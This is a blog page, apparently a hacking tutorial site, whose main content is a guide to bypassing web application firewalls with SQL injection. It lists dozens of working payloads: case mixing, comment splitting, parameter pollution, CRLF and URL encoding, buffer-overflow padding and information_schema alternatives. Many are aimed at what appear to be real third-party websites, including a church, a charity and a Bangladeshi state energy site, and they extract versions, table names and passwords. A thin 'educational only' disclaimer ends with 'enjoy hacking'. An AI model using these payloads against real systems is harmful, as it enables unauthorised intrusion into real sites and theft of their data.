Jual DVD game HD android dan Tutorial oprek android

Home All post with category How To Become A Hacker

SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)

<div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"> ***this tutorial to show you how to Bypass WAF(Web Application Firewall)***</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">id=-130+Union+select+1,2,3,4,5,6,7,8,9--</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi686T9JsvHqh2HrTNb03wRQLID7y7m_Cb1MAAWfx8G7DlJiAVf7Fey95NVaBhji_yNa7iJCrVuJECUXdtyr63nV1I051WduVDOJDdUgnlsyDVu-6SZn9NE9mI0rNW5r6sMDNQ3JGD9tHGD/s1600/waf.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)" border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi686T9JsvHqh2HrTNb03wRQLID7y7m_Cb1MAAWfx8G7DlJiAVf7Fey95NVaBhji_yNa7iJCrVuJECUXdtyr63nV1I051WduVDOJDdUgnlsyDVu-6SZn9NE9mI0rNW5r6sMDNQ3JGD9tHGD/s320/waf.png" title="SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)</td></tr></tbody></table><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">like we see [select] is down let's double text [Replacing keywords] like this SeLselectECT</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">www.instintocigano.com.br/artigos-de-baralho-cigano.php</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><span style="line-height: 19.2px;">id=-130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9--</span></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[5] WAF Bypassing – using characters.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">There is a whole bunch of characters available we can use to bypass WAF filters.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">following characters can do this:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">|, ?, ", ', *, %, £ , [], ;, :, \/, $, €, ()...</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">by using these characters in lots of cases /*!*/ is not filtered. But the sign * is replaced whit a space and union – select are filtered. which means replacing the keywords would not work.<br style="margin: 0px; padding: 0px;" />In these cases we can simply use the * character to split the keywords.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">We would do the next logical thing:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3,4--+-</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Almost the same as splitting keywords.<br style="margin: 0px; padding: 0px;" />But in this case only * is filtered out by the was replacing it whit a space having the same result as in splitting keywords.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[6] Advanced WAF Bypassing – Capitalization.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Another way is to simply capitalize our characters.<br style="margin: 0px; padding: 0px;" />Instead of union UnIoN In some basic WAF’s this will work.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">An example in URL:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">www.[site].com/index.php?id=-1+UnIoN+SeLeCt+1,2,3,4--+-</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[7] HTTP Parameter Pollution (HPP)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name. Since none of the relevant HTTP RFCs define the semantics of HTTP parameter manipulation, each web application delivery platform may deal with it differently. In particular, some environments process such requests by concatenating the values taken from all instances of a parameter name within the request. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">we see two SQL injection vectors: "Regular attack" and "Attack using HPP". The regular attack demonstrates a standard SQL injection in the prodID parameter. This attack can be easily identified by a security detection mechanism, such as a Web Application Firewall (WAF). The second attack [Figure:2] uses HPP on the prodID parameter. In this case, the attack vector is distributed across multiple occurrences of the prodID parameter. With the correct combination of technology environment and web server, the attack succeeds. In order for a WAF to identify and block the complete attack vector it required to also check the concatenated inputs.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://testasp.vulnweb.com/showforum.asp?id=-1 union select 1,2 --</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">testasp.vulnweb.com/showforum.asp?id=-1/* &id= */union/* &id= */select/* &id= */1,2 --</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">HPP technique</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Spoiler (Click to View)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[8] CRLF WAF Bypass technique</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">CR LF means "Carriage Return, Line Feed"</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">CR LF means "Carriage Return, Line Feed"-it's a DOS hangover from the olden days from when some devices required a Carriage Return, and some devices required a Line Feed to get a new line, so Microsoft decided to just make a new-line have both characters, so that they would output correctly on all devices.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Windows programs expect their newline format in CRLF (\r\n). *nix expect just LF data (\n). If you open a Unix text document in Notepad on windows, you'll notice that all of the line breaks dissapear and the entire document is on one line. That's because Notepad expects CRLF data, and the Unix document doesn't have the \r character.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">There are applications that will convert this for you on a standard *nix distro (dos2unix and unix2dos)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">For those wondering, a carriage return and a line feed differ from back in Typewriter days, when a carriage return and a line feed were two different things. One would take you to the beginning of the line (Carriage Return) and a one would move you one row lower, but in the same horizontal location (Line Feed)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">CRLF technique</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Syntax :</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">PHP Code:<br style="margin: 0px; padding: 0px;" />%0A%0D+Mysql Statement's+%0A%0D</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">?id=-2+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D/*!+77771,77772,unhex(hex(/*!password*/)),77774+from+/*!`users`*/-- -</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Example in URL:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">fpchurch.org.uk/News/view.php?id=-26+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5 --</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[9] Fatal Error Occurred bypassing</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">to understand how we can bypassing Fatal Error Occurred see this Example :</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Example in URL:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8--</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Which it concluded that the error in the structure of one of the columns To avoid this error try changing the word column column value null one by one :-</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">PHP Code:<br style="margin: 0px; padding: 0px;" />http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6,7,8-- Error<br style="margin: 0px; padding: 0px;" />http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6,7,8-- Error<br style="margin: 0px; padding: 0px;" />http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6,7,8-- Error<br style="margin: 0px; padding: 0px;" />http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6,7,8-- Error<br style="margin: 0px; padding: 0px;" />http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8-- No Error</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">demo :-</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8--</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[10] Bypass with Information_schema.tables</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">now I will show you many method to Bypass Information_schema.tables</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[1] Spaces<br style="margin: 0px; padding: 0px;" />information_schema . tables</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[2] Backticks</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">`information_schema`.`tables`</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[3] Specific Code</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">PHP Code:<br style="margin: 0px; padding: 0px;" />/*!information_schema.tables*/</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[4] Encoded</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">FROM+information_schema%20%0C%20.%20%09tables</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[5] foo with `.`</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA())</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[6] Alternative Names</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Alternative Names technique with Example :-</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">PHP Code:<br style="margin: 0px; padding: 0px;" />information_schema.statistics<br style="margin: 0px; padding: 0px;" />information_schema.key_column_usage<br style="margin: 0px; padding: 0px;" />information_schema.table_constraints<br style="margin: 0px; padding: 0px;" />information_schema.partitions</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">The [STATISTICS] table provides information about table indexes.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">let's see some Example to extract tables and columns</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Example -1 [table] : [information_schema.statistics]</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">fpchurch.org.uk/News/view.php?id=-26+union+select+1,group_concat(table_name),3,4,5+from+information_schema.statistics --</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Example -2 [column] : [information_schema.key_column_usage]</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://fpchurch.org.uk/News/view.php?id=-26+union+select+1,column_name,3,4,5+from+information_schema.key_column_usage+whe?re+table_name=0x7573657273 --</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[11] Buffer Overflow bypassing</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Majority waf Allowav written in the C language, which makes them vulnerable to override.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">In July 2000, a vulnerability to buffer overflow attack was discovered in Microsoft Outlook and Outlook Express. A programming flaw made it possible for an attacker to compromise the integrity of the target computer by simply it sending an e-mail message. Unlike the typical e-mail virus, users could not protect themselves by not opening attached files; in fact, the user did not even have to open the message to enable the attack. The programs' message header mechanisms had a defect that made it possible for senders to overflow the area with extraneous data, which allowed them to execute whatever type of code they desired on the recipient's computers. Because the process was activated as soon as the recipient downloaded the message from the server, this type of buffer overflow attack was very difficult to defend. Microsoft has since created a patch to eliminate the vulnerability.</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Buffer Overflow statement in SQLI<span style="line-height: 19.2px;">+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)</span></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">this AAAAA it's more 1000 A</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Example in URL:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">PHP Code:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br style="margin: 0px; padding: 0px;" />http://www.punjab-dj.com/music/song.php?cat=Punjabi&n==25799' and 0 union select 1,version(),3,4,5,6,7,8,9--+</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">with Buffer overflow WAF Bypass Unexpected</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://www.punjab-dj.com/music/song.php?cat=Punjabi&n==25799'+and(/*!50000select*/ 1)=(/*!32302select*/ 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAAAAAAA<br style="margin: 0px; padding: 0px;" />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA<br style="margin: 0px; padding: 0px;" />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA<br style="margin: 0px; padding: 0px;" />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA<br style="margin: 0px; padding: 0px;" />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA<br style="margin: 0px; padding: 0px;" />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA<br style="margin: 0px; padding: 0px;" />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAA)+ and 0 union select 1,version(),3,4,5,6,7,8,9--+</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://www.petrobangla.org.bd/notice_details.php?nid=594 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!50000union*/ select 1,version(),3,4,5,6,7,8,9--</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Part [2]</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"><br /></div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">now let's see some tricks</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[1] Union Select bypassing :-<br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+--+Union+--+Select+--+<br style="margin: 0px; padding: 0px;" />+#uNiOn+#sEleCt+<br style="margin: 0px; padding: 0px;" />+union+distinct+select+<br style="margin: 0px; padding: 0px;" />+union+distinctROW+select+<br style="margin: 0px; padding: 0px;" />+union%23aa%0Aselect+<br style="margin: 0px; padding: 0px;" />0%a0union%a0select%09<br style="margin: 0px; padding: 0px;" />%0Aunion%0Aselect%0A<br style="margin: 0px; padding: 0px;" />+UnIoN+SeLselectECT+</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">/%2A%2A/union/%2A%2A/select/%2A%2A/<br style="margin: 0px; padding: 0px;" />%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/<br style="margin: 0px; padding: 0px;" />+%2F**%2Funion%2F**%2Fselect+</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+UnIoN/*&a=*/SeLeCT/*&a=*/</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D<br style="margin: 0px; padding: 0px;" />/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/<br style="margin: 0px; padding: 0px;" />%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[2] concat bypassing</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">group_concat()<br style="margin: 0px; padding: 0px;" />grOUp_ConCat(/*!*/,0x3e,/*!*/)<br style="margin: 0px; padding: 0px;" />group_concat(,0x3c62723e)<br style="margin: 0px; padding: 0px;" />g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">CoNcAt()<br style="margin: 0px; padding: 0px;" />concat()<br style="margin: 0px; padding: 0px;" />CoNcAt()<br style="margin: 0px; padding: 0px;" />CONCAT(DISTINCT )<br style="margin: 0px; padding: 0px;" />concat(0x3a,,0x3c62723e)<br style="margin: 0px; padding: 0px;" />/*!50000cOnCat*/</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">concat_ws()<br style="margin: 0px; padding: 0px;" />concat_ws(0x3a,)<br style="margin: 0px; padding: 0px;" />CONCAT_WS(CHAR(32,58,32),version(),)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">REVERSE(tacnoc)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">binary(version())</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">uncompress(compress(version()))</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">aes_decrypt(aes_encrypt(version(),1),1)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[3] LIMIT pybassing</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">If LIMIT not work we can use :-<br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+LIMIT+0,1</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+where+id+=1</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">WHERE ID_Produit='26 -- -</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+having+id+=1</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+and length((select password from users having substr(pass,1,1)=’a'))</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[4] Null Parameter</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">id=-1<br style="margin: 0px; padding: 0px;" />id=null<br style="margin: 0px; padding: 0px;" />id=1+and+false+<br style="margin: 0px; padding: 0px;" />id=9999<br style="margin: 0px; padding: 0px;" />id=1 and 0<br style="margin: 0px; padding: 0px;" />id==1<br style="margin: 0px; padding: 0px;" />id=(-1)<br style="margin: 0px; padding: 0px;" />=1=1</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+And+1=0<br style="margin: 0px; padding: 0px;" />/*!and*/+1=0</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[5] If Column not Appear<br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Having+1=1 <br style="margin: 0px; padding: 0px;" />+and=0+<br style="margin: 0px; padding: 0px;" />+div+0+<br style="margin: 0px; padding: 0px;" />replace ' = %23 <br style="margin: 0px; padding: 0px;" />where 1=1<br style="margin: 0px; padding: 0px;" />Example in URL:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://fpchurch.org.uk/News/view.php?id=-26+div+0+union+select+1,2,3,4,5 --</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">=2=2 Error based</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Example in URL:<br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">fpchurch.org.uk/News/view.php?id=26=26+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(version()+as+char),0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) <br style="margin: 0px; padding: 0px;" /><br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">+union+select 1111,2222,3333-- see sorce<br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://fpchurch.org.uk/News/view.php?id=-26+div+0+union+select+1111,2222,3333,4444,5555 -- <br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[6] unhex(hex code :-</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">unhex(hex(value))</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">convert(database() using latin1)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">cast(value as char)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">uncompress(compress(version()))</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">cast(value as char)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">aes_decrypt(aes_encrypt(value,1),1)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">binary(value)</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">convert()<br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Example in URL:</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">http://www.andytimmons.com/video.php?id=-0004 UNION SELECT 1,2,convert(database() using latin1),4,5,6,7,8--</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">[7] Requested to WAF bypassing :-</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;"># tables #<br style="margin: 0px; padding: 0px;" /><br style="margin: 0px; padding: 0px;" /> </div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">In tables directly</div><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1) <br style="margin: 0px; padding: 0px;" /><br style="margin: 0px; padding: 0px;" /><br style="margin: 0px; padding: 0px;" /> </div><br /><div dir="ltr" style="font-family: Arial; line-height: 19.2px; padding: 0px;">Warning:<br style="margin: 0px; padding: 0px;" />The above post is completely for educational purpose only.  Never attempt to follow the above ste<br style="margin: 0px; padding: 0px;" />ps against third-party websites.<br style="margin: 0px; padding: 0px;" />:D enjoy hacking</div>

***this tutorial to show you how to Bypass WAF(Web Application Firewall)*** http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?...

View Post

What Is Hacking?

No comments:

<div dir="ltr" style="text-align: left;" trbidi="on"><h2><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><i>What is Hacking?</i></span></h2><br /><span style="font-family: Arial, Helvetica, sans-serif;">In the cyber security world, the person who is able to discover a weakness in the system and manages to exploit it to accomplish his goal(Good or Bad) is referred as a <b><i>Hacker </i></b>, and the process is referred to as Hacking. <br /><br /> Nowadays, People think that hacking is only hijacking <b>Facebook accounts</b> or <b>defacing websites</b>. Yes, it is also part of <b>hacking</b> field but it doesn't mean that it is all there is. This is not even the tip of the iceberg. <br /><br /> So what is exactly hacking and what should you do to become a hacker?! That is exactly what this website is for. The only thing you need to become a hacker is interest and dedication. You should always be ready to learn something new and learn to create something newer. <br /><br /><b><i> Hacking </i></b>is the practice of modifying the features of a system or finding a loophole, in order to accomplish a goal outside of the creator's original purpose. <br /></span><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq34cKJFo1V8Fc-JvZ7mIR267O0dfMY9YNyRdqHDSbFtZtEDTTHFuqjgxqO5_c1n9zYnfCKryzXV-IJrueYZk564FJwufwv3GyI_T9kpwopQR7YDcf-WH_mHksPFpIdjSEecIlBv7g2PFl/s1600/hacking.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="What Is Hacking?" border="0" height="261" 